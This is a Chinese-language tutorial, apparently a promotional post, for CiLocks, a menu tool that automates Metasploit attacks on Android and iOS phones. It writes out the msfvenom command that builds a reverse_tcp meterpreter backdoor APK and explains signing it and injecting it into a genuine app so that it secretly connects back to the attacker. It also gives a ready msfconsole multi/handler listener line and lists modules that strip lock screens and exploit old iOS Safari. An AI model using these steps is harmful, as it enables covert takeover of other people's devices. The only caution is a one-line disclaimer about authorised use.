CiLocks Metasploit入门:4种Listener模式与msfconsole快速上手
【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks
CiLocks 是一款面向 Android/iOS 的终端安全测试工具箱,其中与Metasploit深度集成的模块是它的核心亮点:通过msfconsole一键拉起 exploit 与 post 模块,配合msfvenom生成reverse_tcp 后门 APK,并内置4 种 Listener 模式,让新手无需手写复杂命令即可快速上手移动端渗透实验。
⚠️ 声明:本项目仅可用于合法授权的安全测试与学习研究,请勿用于任何非法用途。
一键安装CiLocks:3步完成环境部署
CiLocks 运行在 Linux 终端环境(Kali、NetHunter、Termux 均可),依赖 ADB、PHP、Node 等工具。
第一步:安装基础依赖
sudo apt update -y sudo apt install php nodejs npm adb scrcpy wget unzip apktool jq -y第二步:安装 Metasploit(msfconsole)
sudo apt install msfconsole -y第三步:克隆仓库并启动
git clone https://gitcode.com/GitHub_Trending/ci/CiLocks cd CiLocks chmod +x cilocks sudo bash cilocks启动后脚本会自动检测系统信息与已安装组件。贴心的是,data/config 会专门检查msfconsole是否存在,若未安装会弹窗提示sudo apt-get install msfconsole -y,避免新手在 Metasploit 菜单处卡住。
Metasploit子菜单:4大功能一览
在主菜单输入10进入Jump To Metasploit后,会出现「Metasploit Backdoor Generator」子菜单,入口逻辑位于主脚本 cilocks:
- Install Application— 通过 ADB 安装 APK 到目标设备
- Create Payload Backdoor {Msfvenom} Singed— 生成并签名后门 APK
- Run Metasploit— 启动 msfconsole 并选择 4 种 Listener 模式
- Inject Payload In Original Application— 将 payload 注入到原始应用中
功能1:Install Application 安装应用
输入 APK 路径并可选择是否立即运行。脚本执行adb install完成安装,若选择运行还会询问包名并自动启动对应 Activity,是测试阶段把"目标应用"部署到模拟器的最快方式。
功能2:Msfvenom 生成签名的Payload后门
这是整个工作流的起点。脚本会依次执行:
- 用
msfvenom -p android/meterpreter/reverse_tcp lhost=<你的IP> lport=<端口>生成反向连接 payload - 用
keytool创建 Keystore、jarsigner签名(Android 要求 APK 必须签名才能安装) - 用
zipalign对齐优化,最终产物保存在 backdoor/ 目录
你只需填入LHOST(攻击机 IP)与LPORT(监听端口),其余全自动。生成的 APK 在目标上打开后,会主动向你的 msfconsole 发起回连。
功能3:Run Metasploit —— 4种Listener模式详解
进入选项 3 后,CiLocks 展示了平台 payload 并给出4 种 Listener 模式(源码见 cilocks):
| 模式 | 对应 Metasploit 模块 | 适用场景 |
|---|---|---|
| 1. Multi Handler {默认} | exploit/multi/handler | 通用接收器,等待任何 payload 回连,最常用 |
| 2. Remove Lock | post/android/manage/remove_lock | 获取会话后自动移除 Android 锁屏 |
| 3. Remove Lock {Root} | post/android/manage/remove_lock_root | 针对已 Root 设备的锁屏移除 |
| 4. Safari Jit {iOS < 7.1.2} | exploit/apple_ios/browser/safari_jit | 攻击老版本 iOS 的 Safari 漏洞 |
对应关系一目了然:
- Android 目标→
android/meterpreter/reverse_tcp - iOS 目标→
osx/armle/execute/reverse_tcp
选择模式并填入 LHOST/LPORT 后,脚本会在新 xterm 窗口中执行类似下面的自动化命令:
msfconsole -x 'use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set lhost <IP>; set lport <PORT>; exploit; exit -y'也就是说,CiLocks 把"打开 msfconsole → 选择模块 → 配置参数 → 启动监听"这一整套流程压缩成了菜单操作,这正是新手快速上手 Metasploit 的捷径。
功能4:Inject Payload 注入原始应用
与功能 2 生成空白后门不同,功能 4 使用msfvenom --platform android -x <原始APK> ...的方式,把 reverse_tcp payload注入到你提供的原始 APK中,产物同样输出到 backdoor/ 目录。注入后的应用界面不变,打开时却在后台回连——这是移动端渗透中最经典的投递手法,也是理解"为什么后门要签名"的关键环节。
常见问题:msfconsole与Listener排错清单
Q1:选完 Listener 没反应或提示找不到模块?先确认msfconsole -v可用;模块报缺失时执行msfupdate更新模块库。
Q2:目标 APK 打开了但一直没回连?检查三点:LHOST 是否为攻击机同一局域网的 IP、LPORT 是否被占用、目标设备与攻击机防火墙是否放行。
Q3:Remove Lock 系列模式与 Multi Handler 是互斥的吗?不是。Multi Handler 是"收连接"的监听器;Remove Lock 是拿到 meterpreter 会话后执行的 post 模块。实际使用通常先起 Multi Handler 拿会话,再在 msfconsole 里跑 remove_lock。
Q4:模拟器里 Brute 功能不生效?README 提示:若每 5 次错误后自动延迟 30 秒,可在脚本中调整adb shell input keyevent 26相关逻辑,具体见 README.md。
结语
CiLocks 的 Metasploit 模块把移动端渗透的完整链条——msfvenom 生成后门 → 签名注入 → msfconsole 四种 Listener 监听 → 锁屏移除——封装进了一个菜单,对刚接触msfconsole的新手极为友好。建议先在 Android 模拟器(NetHunter/Termux 已 Root)上跑通 Multi Handler 默认模式,再逐步尝试其余 Listener,理解每个模块背后的原理后,你也就真正入门了 Metasploit。
【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考